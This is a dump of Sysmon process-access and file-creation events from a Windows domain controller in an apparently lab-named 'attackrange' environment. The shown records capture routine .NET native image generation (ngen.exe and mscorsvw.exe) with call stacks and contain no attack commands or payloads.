l+51791 10341000x80000000000000008732Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:23.678{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-925B-6005-7704-00000000A301}4916C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008731Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:23.678{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-925B-6005-7704-00000000A301}4916C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008730Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:51:23.616{59A5CD1D-925B-6005-7604-00000000A301}4888C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1318-0\System.Web.ApplicationServices.dll2021-01-18 13:51:23.616 10341000x80000000000000008729Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:23.569{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-925B-6005-7604-00000000A301}4888C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008728Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:23.553{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-925B-6005-7604-00000000A301}4888C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008727Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:23.553{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-925B-6005-7604-00000000A301}4888C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008726Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:23.507{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-925B-6005-7504-00000000A301}2856C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008725Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:23.491{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-925B-6005-7504-00000000A301}2856C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008724Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:23.491{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-925B-6005-7504-00000000A301}2856C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008723Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:51:23.444{59A5CD1D-925B-6005-7404-00000000A301}3448C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\d78-0\System.Web.Abstractions.dll2021-01-18 13:51:23.444 10341000x80000000000000008722Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:23.413{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-925B-6005-7404-00000000A301}3448C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008721Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:23.397{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-925B-6005-7404-00000000A301}3448C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008720Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:23.397{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-925B-6005-7404-00000000A301}3448C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008719Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:23.319{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-925B-6005-7304-00000000A301}4396C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008718Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:23.303{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-925B-6005-7304-00000000A301}4396C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008717Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:23.303{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-925B-6005-7304-00000000A301}4396C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008743Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:25.928{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-925D-6005-7A04-00000000A301}5088C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008742Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:25.913{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-925D-6005-7A04-00000000A301}5088C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008741Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:25.913{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-925D-6005-7A04-00000000A301}5088C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008740Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:25.850{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-925D-6005-7904-00000000A301}4884C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008739Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:25.835{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-925D-6005-7904-00000000A301}4884C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008738Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:25.835{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-925D-6005-7904-00000000A301}4884C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008737Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:51:25.694{59A5CD1D-925B-6005-7804-00000000A301}3968C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\f80-0\System.Web.DataVisualization.dll2021-01-18 13:51:25.694 10341000x80000000000000008750Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:26.397{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-925E-6005-7C04-00000000A301}2868C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008749Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:26.381{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-925E-6005-7C04-00000000A301}2868C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008748Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:26.381{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-925E-6005-7C04-00000000A301}2868C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\F